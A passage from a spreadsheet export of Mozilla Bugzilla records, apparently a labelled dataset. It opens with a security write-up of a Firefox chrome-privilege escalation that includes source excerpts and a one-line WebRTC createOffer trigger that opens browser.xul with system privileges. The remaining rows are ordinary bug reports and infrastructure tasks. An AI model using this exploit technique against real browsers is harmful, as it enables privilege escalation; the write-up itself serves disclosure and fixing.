&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
The noteworthy thing here is that the loaded URI isn't checked when the freePass flag is set to true. The reference to it is passed to nsGlobalWindow::BuildURIfromBase, which does the following:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; nsGlobalWindow.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
nsGlobalWindow::BuildURIfromBase(const char *aURL, nsIURI **aBuiltURI,
                                 bool *aFreeSecurityPass,
                                 JSContext **aCXused)
{
  nsIScriptContext *scx = GetContextInternal();
  JSContext *cx = nullptr;
  *aBuiltURI = nullptr;
  *aFreeSecurityPass = false;
  if (aCXused)
    *aCXused = nullptr;
  // get JSContext
  NS_ASSERTION(scx, "opening window missing its context");
  NS_ASSERTION(mDoc, "opening window missing its document");
  if (!scx || !mDoc)
    return NS_ERROR_FAILURE;
  nsCOMPtr&lt;nsIDOMChromeWindow&gt; chrome_win = do_QueryObject(this);
  if (nsContentUtils::IsCallerChrome() &amp;&amp; !chrome_win) {
    // If open() is called from chrome on a non-chrome window, we'll
    // use the context from the window on which open() is being called
    // to prevent giving chrome priveleges to new windows opened in
    // such a way. This also makes us get the appropriate base URI for
    // the below URI resolution code.
    cx = scx-&gt;GetNativeContext();
  } else {
    // get the JSContext from the call stack
    cx = nsContentUtils::GetCurrentJSContext();
  }
(...)
  nsCOMPtr&lt;nsPIDOMWindow&gt; sourceWindow;
  if (cx) {
    nsIScriptContext *scriptcx = nsJSUtils::GetDynamicScriptContext(cx);
    if (scriptcx)
      sourceWindow = do_QueryInterface(scriptcx-&gt;GetGlobalObject());
  }
  if (!sourceWindow) {
    sourceWindow = this;
    *aFreeSecurityPass = true;
  }
(...)
  if (aCXused)
    *aCXused = cx;
  return NS_NewURI(aBuiltURI, nsDependentCString(aURL), charset.get(), baseURI);
}
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
The free pass is granted when it's impossible to determine the window associated with the script context of the call. In theory, this can happen in 2 cases: when there's no native script context (|cx|) on the stack, or it has no related dynamic script context (|scriptcx|). It's the latter case which is interesting.
Whether or not a native script context (JSContext class) links to a dynamic script context depends on how the JSContext was created and is indicated by the |privateIsNSISupports| option in the related ContextOptions object. For instance, contexts created as part of docshell initialization (in the nsJSContext constructor) are always set up with a dynamic script context. This is not the case with contexts created in other places, for example via XPCJSContextStack::GetSafeJSContext(). If one of those ends up calling content-side window.open with the provided arguments, the URI security check can be bypassed.
One way to achieve that is to use JS-implemented WebIDL. It's windowless -- instead, a BackstagePass object is used as a shim for the script global object. Whenever it's executed, the initial call setup pushes a JSContext from XPCJSContextStack::GetSafeJSContext(), because BackstagePass doesn't implement the nsIScriptGlobalObject interface necessary to derive a JSContext from it.
The exploit uses WebRTC peer connection callbacks as a short and simple method of getting JS-implemented WebIDL to call a user-supplied function:
(new mozRTCPeerConnection).createOffer(Map, open.bind(window, "chrome://browser/content", "i"));
If createOffer is called on a connection without any attached MediaStreams, the error callback, passed in as the second argument, is later invoked from PeerConnection.js:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; PeerConnection.js &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
  _createOffer: function(onSuccess, onError, constraints) {
    this._onCreateOfferSuccess = onSuccess;
    this._onCreateOfferFailure = onError;                  &lt;&lt;&lt; the bound window.open...
    this._getPC().createOffer(constraints);
  },
(...)
  onCreateOfferError: function(code, message) {
    this.callCB(this._dompc._onCreateOfferFailure, new RTCError(code, message));
    this._dompc._executeNext();
  },
(...)
  callCB: function(callback, arg) {
    if (callback) {
      try {
        callback(arg);                                     &lt;&lt;&lt; ... is invoked here
      } catch(e) {
(...)
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
This causes nsGlobalWindow::OpenInternal to be called while the current JSContext has no dynamic script context. As a result, the free security pass is erroneously granted, and a system-principal page -- chrome://browser/content/browser.xul -- is opened in the iframe named "i".
A SIDE NOTE:
In theory, nsGlobalWindow::BuildURIfromBase could choose to use a different JSContext -- the one associated with the window open() is being called on:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; nsGlobalWindow.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
  if (nsContentUtils::IsCallerChrome() &amp;&amp; !chrome_win) {
    cx = scx-&gt;GetNativeContext();                          &lt;&lt;&lt; derived from the window
  } else {
    cx = nsContentUtils::GetCurrentJSContext();            &lt;&lt;&lt; the context of JS-implemented WebIDL
  }
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
However, even though JS-implemented WebIDL code is chrome-privileged, nsContentUtils::IsCallerChrome() returns false. This is caused by the fact that during the call to mozRTCPeerConnection.createOffer, the reference to the bound window.open function is wrapped in a cross-compartment wrapper. As soon as the callback is called, the content compartment of the wrapped function is entered, causing subsequent nsContentUtils::IsCallerChrome() calls to return false.</t>
        </is>
      </c>
      <c r="X3542" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3543">
      <c r="A3543" t="n">
        <v>1762078</v>
      </c>
      <c r="B3543" t="inlineStr">
        <is>
          <t>2022-03-29 15:51:23 -0700</t>
        </is>
      </c>
      <c r="C3543" t="inlineStr">
        <is>
          <t>ServiceWorker-added timing attacks to infer length or existence of cross-origin resources from no-cors media element requests</t>
        </is>
      </c>
      <c r="D3543" t="inlineStr">
        <is>
          <t>2023-06-12 23:52:14 -0700</t>
        </is>
      </c>
      <c r="E3543" t="n">
        <v>1</v>
      </c>
      <c r="F3543" t="n">
        <v>1</v>
      </c>
      <c r="G3543" t="n">
        <v>3</v>
      </c>
      <c r="H3543" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3543" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3543" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K3543" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3543" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3543" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3543" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3543" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3543" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q3543" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3543" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3543" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T3543" t="n">
        <v>1</v>
      </c>
      <c r="U3543" t="n">
        <v>0</v>
      </c>
      <c r="V3543" t="n">
        <v>49</v>
      </c>
      <c r="W3543" t="inlineStr">
        <is>
          <t>(In reply to Anne (:annevk) from bug 1735923 comment 7)
&gt; 1. Jake's fundamental fix is essentially not allowing mixing of non-opaque and opaque responses in media elements.
Bug 1762068 covers a current exposure there.
&gt; Arguably one problem here is that the cross-origin request is still made. It seems like it should be possible to network error earlier when we detect a cross-origin request after we've started using same-origin responses.
That's this bug.
&gt; 2. There's another solution to this problem outside of media elements, which is that we fix Resource Timing along the lines suggested in https://github.com/w3c/resource-timing/issues/165,
Firefox already [adds ResourceTiming entries](https://searchfox.org/mozilla-central/rev/840881e1232f664a58b39caaae6284c7bcf121df/netwerk/protocol/http/HttpBaseChannel.cpp#5094) for both 206 and 416 responses. 
&gt; but it's not clear to me that it could not be exploited in other ways. E.g., it seems timing the cross-origin response might also give the attacker some information about whether it's a 206 or 416.
This bug.
&gt; (There's also https://github.com/whatwg/fetch/pull/1311 about exposing network errors to Resource Timing as well [...].)</t>
        </is>
      </c>
      <c r="X3543" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3544">
      <c r="A3544" t="n">
        <v>861326</v>
      </c>
      <c r="B3544" t="inlineStr">
        <is>
          <t>2013-04-12 12:38:30 -0700</t>
        </is>
      </c>
      <c r="C3544" t="inlineStr">
        <is>
          <t>Re-purpose 30 fed64 machines as 20 Win7 machines and 10 WinXP machines &amp; image four win7 staging machines as winxp</t>
        </is>
      </c>
      <c r="D3544" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E3544" t="n">
        <v>1</v>
      </c>
      <c r="F3544" t="n">
        <v>1</v>
      </c>
      <c r="G3544" t="n">
        <v>6</v>
      </c>
      <c r="H3544" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3544" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J3544" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K3544" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3544" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3544" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3544" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3544" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3544" t="inlineStr"/>
      <c r="Q3544" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3544" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3544" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3544" t="n">
        <v>1</v>
      </c>
      <c r="U3544" t="n">
        <v>0</v>
      </c>
      <c r="V3544" t="n">
        <v>19</v>
      </c>
      <c r="W3544" t="inlineStr">
        <is>
          <t>The machines in particular would be:
talos-r3-fed64-001
talos-r3-fed64-002
talos-r3-fed64-003
talos-r3-fed64-004
talos-r3-fed64-005
talos-r3-fed64-006
talos-r3-fed64-007
talos-r3-fed64-008
talos-r3-fed64-009
talos-r3-fed64-010
talos-r3-fed64-011
talos-r3-fed64-012
talos-r3-fed64-013
talos-r3-fed64-014
talos-r3-fed64-015
talos-r3-fed64-016
talos-r3-fed64-017
talos-r3-fed64-018
talos-r3-fed64-019
talos-r3-fed64-020
talos-r3-fed64-021
talos-r3-fed64-022
talos-r3-fed64-023
talos-r3-fed64-024
talos-r3-fed64-025
talos-r3-fed64-026
talos-r3-fed64-027
talos-r3-fed64-028
talos-r3-fed64-029
talos-r3-fed64-030
The names will be:
talos-r3-w7-115
talos-r3-w7-116
talos-r3-w7-117
talos-r3-w7-118
talos-r3-w7-119
talos-r3-w7-120
talos-r3-w7-121
talos-r3-w7-122
talos-r3-w7-123
talos-r3-w7-124
talos-r3-w7-125
talos-r3-w7-126
talos-r3-w7-127
talos-r3-w7-128
talos-r3-w7-129
talos-r3-w7-130
talos-r3-w7-131
talos-r3-w7-132
talos-r3-w7-133
talos-r3-w7-134
talos-r3-w7-135
talos-r3-xp-111
talos-r3-xp-112
talos-r3-xp-113
talos-r3-xp-114
talos-r3-xp-115
talos-r3-xp-116
talos-r3-xp-117
talos-r3-xp-118
talos-r3-xp-119
talos-r3-xp-120
talos-r3-xp-121
talos-r3-xp-122
talos-r3-xp-123
talos-r3-xp-124
talos-r3-xp-125</t>
        </is>
      </c>
      <c r="X3544" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3545">
      <c r="A3545" t="n">
        <v>423541</v>
      </c>
      <c r="B3545" t="inlineStr">
        <is>
          <t>2008-03-17 16:24:44 -0700</t>
        </is>
      </c>
      <c r="C3545" t="inlineStr">
        <is>
          <t>Arbitrary file upload via originalTarget and DOM Range</t>
        </is>
      </c>
      <c r="D3545" t="inlineStr">
        <is>
          <t>2009-01-05 11:53:14 -0800</t>
        </is>
      </c>
      <c r="E3545" t="n">
        <v>1</v>
      </c>
      <c r="F3545" t="n">
        <v>1</v>
      </c>
      <c r="G3545" t="n">
        <v>3</v>
      </c>
      <c r="H3545" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3545" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3545" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3545" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3545" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3545" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3545" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3545" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3545" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3545" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3545" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3545" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3545" t="n">
        <v>1</v>
      </c>
      <c r="U3545" t="n">
        <v>0</v>
      </c>
      <c r="V3545" t="n">
        <v>18</v>
      </c>
      <c r="W3545" t="inlineStr">
        <is>
          <t>Created attachment 310115
Testcase
As reported to security@ by Opera:
While investigating potential file upload issues, one of our security
researchers came across another vulnerability in Firefox.  This is
unrelated to the issues that we have previously reported to you.
Attached.  Exploiting the issue only requires one click (anywhere in the
page), and one keypress (a-z, 0-9...any typed character works, although
ctrl/shift/backspace/etc don't work).
Filing in DOM:HTML since that's where bug 413135 was filed.</t>
        </is>
      </c>
      <c r="X3545" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3546">
      <c r="A3546" t="n">
        <v>525326</v>
      </c>
      <c r="B3546" t="inlineStr">
        <is>
          <t>2009-10-29 14:33:51 -0700</t>
        </is>
      </c>
      <c r="C3546" t="inlineStr">
        <is>
          <t>Crashes in gif decoder [@ xul.dll@0x348945][@ xul.dll@0x348864][@nsGIFDecoder2::GifWrite(unsigned char const*, unsigned int)]</t>
        </is>
      </c>
      <c r="D3546" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:49 -0700</t>
        </is>
      </c>
      <c r="E3546" t="n">
        <v>1</v>
      </c>
      <c r="F3546" t="n">
        <v>1</v>
      </c>
      <c r="G3546" t="n">
        <v>3</v>
      </c>
      <c r="H3546" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3546" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3546" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3546" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3546" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3546" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3546" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3546" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3546" t="inlineStr">
        <is>
          <t>[sg:dos] null deref</t>
        </is>
      </c>
      <c r="Q3546" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3546" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3546" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T3546" t="n">
        <v>1</v>
      </c>
      <c r="U3546" t="n">
        <v>0</v>
      </c>
      <c r="V3546" t="n">
        <v>52</v>
      </c>
      <c r="W3546" t="inlineStr">
        <is>
          <t>We're seeing lots of crashes in the GIF decoder, involving nsGIFDecoder2::ProcessData calling GifWrite(), then a null dereference. Right now, this is showing up in the noted crash site, but this is a Windows-specific, 3.5.4-specific crash site, since the offset in xul.dll will change with every build, and obviously xul.dll has no meaning on OS X or Linux.
Our first priority is figuring out where we're crashing; Jeff Muizelaar and I are working on that. A parallel process that someone else could look into is whether this started in 3.5.4, or whether similar crashes existed elsewhere.</t>
        </is>
      </c>
      <c r="X3546" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3547">
      <c r="A3547" t="n">
        <v>602640</v>
      </c>
      <c r="B3547" t="inlineStr">
        <is>
          <t>2010-10-07 13:57:05 -0700</t>
        </is>
      </c>
      <c r="C3547" t="inlineStr">
        <is>
          <t>Turn off HgPoller for shadow-central https: hgurl</t>
        </is>
      </c>
      <c r="D3547" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3547" t="n">
        <v>1</v>
      </c>
      <c r="F3547" t="n">
        <v>1</v>
      </c>
      <c r="G3547" t="n">
        <v>5</v>
      </c>
      <c r="H3547" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3547" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3547" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3547" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3547" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3547" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3547" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3547" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3547" t="inlineStr"/>
      <c r="Q3547" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3547" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3547" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3547" t="n">
        <v>1</v>
      </c>
      <c r="U3547" t="n">
        <v>0</v>
      </c>
      <c r="V3547" t="n">
        <v>5</v>
      </c>
      <c r="W3547" t="inlineStr">
        <is>
          <t>Created attachment 481629
[needs testing] Turn off HgPoller in misc.py for 'https:' hgurl
Since this throws errors anyway I'm attaching a patch to turn it off for any branch that uses 'https:' in the hgurl setting.</t>
        </is>
      </c>
      <c r="X3547" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3548">
      <c r="A3548" t="n">
        <v>1117168</v>
      </c>
      <c r="B3548" t="inlineStr">
        <is>
          <t>2015-01-02 10:54:15 -0800</t>
        </is>
      </c>
      <c r="C3548" t="inlineStr">
        <is>
          <t>Processor responsiveness regression</t>
        </is>
      </c>
      <c r="D3548" t="inlineStr">
        <is>
          <t>2015-01-07 10:40:06 -0800</t>
        </is>
      </c>
      <c r="E3548" t="n">
        <v>1</v>
      </c>
      <c r="F3548" t="n">
        <v>1</v>
      </c>
      <c r="G3548" t="n">
        <v>4</v>
      </c>
      <c r="H3548" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3548" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3548" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K3548" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3548" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3548" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3548" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3548" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3548" t="inlineStr"/>
      <c r="Q3548" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3548" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3548" t="n">
        <v>1</v>
      </c>
      <c r="U3548" t="n">
        <v>0</v>
      </c>
      <c r="V3548" t="n">
        <v>2</v>
      </c>
      <c r="W3548" t="inlineStr">
        <is>
          <t>Processor2015 is not as responsive to SIGTERM as the HybridProcessor was.  That's because the TransformRule system doesn't honor the quit_check callback function.
fix it.</t>
        </is>
      </c>
      <c r="X3548" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3549">
      <c r="A3549" t="n">
        <v>262387</v>
      </c>
      <c r="B3549" t="inlineStr">
        <is>
          <t>2004-09-30 21:42:57 -0700</t>
        </is>
      </c>
      <c r="C3549" t="inlineStr">
        <is>
          <t>"Find as you type" steals focus from plugins' input fields</t>
        </is>
      </c>
      <c r="D3549" t="inlineStr">
        <is>
          <t>2020-11-01 19:44:01 -0800</t>
        </is>
      </c>
      <c r="E3549" t="n">
        <v>1</v>
      </c>
      <c r="F3549" t="n">
        <v>1</v>
      </c>
      <c r="G3549" t="n">
        <v>3</v>
      </c>
      <c r="H3549" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3549" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3549" t="inlineStr">
        <is>
          <t>Find Toolbar</t>
        </is>
      </c>
      <c r="K3549" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3549" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3549" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3549" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3549" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3549" t="inlineStr"/>
      <c r="Q3549" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3549" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3549" t="inlineStr">
        <is>
          <t>mozilla1.8.1beta2</t>
        </is>
      </c>
      <c r="T3549" t="n">
        <v>1</v>
      </c>
      <c r="U3549" t="n">
        <v>2</v>
      </c>
      <c r="V3549" t="n">
        <v>8</v>
      </c>
      <c r="W3549" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.3) Gecko/20040928 Firefox/0.10
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.3) Gecko/20040928 Firefox/0.10
When filling in inputs in Flash movies, Find as you Type tries to find on the
page whatever I type.
For example: if you Go to http://www.macromedia.com/ and try to use the Flash
interface for the searchbox in the upper-right corner, it will input the first
letter and then Find as you Type takes over.
Note: I have accessibility.typeaheadfind.linksonly set to false. Not sure if
this influences the bug at all.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.macromedia.com/
2. Click into the search box in the Flash movie
3. Start typing something
Actual Results:  
Find as you Type searches the page as if I had clicked on the page's HTML
content instead of into a Flash movie.
Expected Results:  
Treated the Flash movie essentially like a form's input, ignoring the urge to
bring up Find as you Type as long as the movie has the focus.
I can also reproduce the bug by following the same steps in Mozilla 1.8a4, but
not in 1.8a1 or earlier. Definitely never had this issue prior to the new Type
as you Find functionality (ie. the bar at the bottom of the screen).</t>
        </is>
      </c>
      <c r="X3549" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3550">
      <c r="A3550" t="n">
        <v>1539272</v>
      </c>
      <c r="B3550" t="inlineStr">
        <is>
          <t>2019-03-26 14:33:45 -0700</t>
        </is>
      </c>
      <c r="C3550" t="inlineStr">
        <is>
          <t>404 on fetching jesse-updates -- can't build docker images</t>
        </is>
      </c>
      <c r="D3550" t="inlineStr">
        <is>
          <t>2019-04-01 06:52:50 -0700</t>
        </is>
      </c>
      <c r="E3550" t="n">
        <v>1</v>
      </c>
      <c r="F3550" t="n">
        <v>1</v>
      </c>
      <c r="G3550" t="n">
        <v>4</v>
      </c>
      <c r="H3550" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3550" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3550" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3550" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3550" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3550" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3550" t="inlineStr"/>
      <c r="Q3550" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3550" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3550" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3550" t="n">
        <v>1</v>
      </c>
      <c r="U3550" t="n">
        <v>0</v>
      </c>
      <c r="V3550" t="n">
        <v>5</v>
      </c>
      <c r="W3550" t="inlineStr">
        <is>
          <t>We're still using Jessie because we need to build breakpad client minidump-stackwalk and haven't updated that to work with more recent versions of ... I think it's gcc and/or libs. Anyhow, I haven't been able to build those with stretch.
According to this:
https://lists.debian.org/debian-devel-announce/2019/03/msg00006.html
the jessie things we're using have moved.
We're unable to build images now--this completely halts development and deploys and needs to get fixed.
This bug covers figuring that out.</t>
        </is>
      </c>
      <c r="X3550" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3551">
      <c r="A3551" t="n">
        <v>314871</v>
      </c>
      <c r="B3551" t="inlineStr">
        <is>
          <t>2005-11-02 19:35:08 -0800</t>
        </is>
      </c>
      <c r="C3551" t="inlineStr">
        <is>
          <t>[SECURITY] Web browsers can see CVS/, contrib/, docs/, and t/ directory files</t>
        </is>
      </c>
      <c r="D3551" t="inlineStr">
        <is>
          <t>2010-02-03 10:10:53 -0800</t>
        </is>
      </c>
      <c r="E3551" t="n">
        <v>1</v>
      </c>
      <c r="F3551" t="n">
        <v>1</v>
      </c>
      <c r="G3551" t="n">
        <v>4</v>
      </c>
      <c r="H3551" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3551" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3551" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3551" t="inlineStr">
        <is>
          <t>2.21</t>
        </is>
      </c>
      <c r="L3551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3551" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3551" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3551" t="inlineStr"/>
      <c r="Q3551" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3551" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S3551" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T3551" t="n">
        <v>1</v>
      </c>
      <c r="U3551" t="n">
        <v>0</v>
      </c>
      <c r="V3551" t="n">
        <v>51</v>
      </c>
      <c r="W3551" t="inlineStr">
        <is>
          <t>This is actually a trivial security problem.  We should block access to the CVS/Root, CVS/Repository, and CVS/Entries files.  
It is almost silly to mark this as a security bug, but it should be very easy to take care of.</t>
        </is>
      </c>
      <c r="X3551" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3552">
      <c r="A3552" t="n">
        <v>594875</v>
      </c>
      <c r="B3552" t="inlineStr">
        <is>
          <t>2010-09-09 11:38:34 -0700</t>
        </is>
      </c>
      <c r="C3552" t="inlineStr">
        <is>
          <t>Upgrade Django</t>
        </is>
      </c>
      <c r="D3552" t="inlineStr">
        <is>
          <t>2010-10-05 13:31:22 -0700</t>
        </is>
      </c>
      <c r="E3552" t="n">
        <v>1</v>
      </c>
      <c r="F3552" t="n">
        <v>1</v>
      </c>
      <c r="G3552" t="n">
        <v>5</v>
      </c>
      <c r="H3552" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3552" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3552" t="inlineStr">
        <is>
          <t>Code Quality</t>
        </is>
      </c>
      <c r="K3552" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
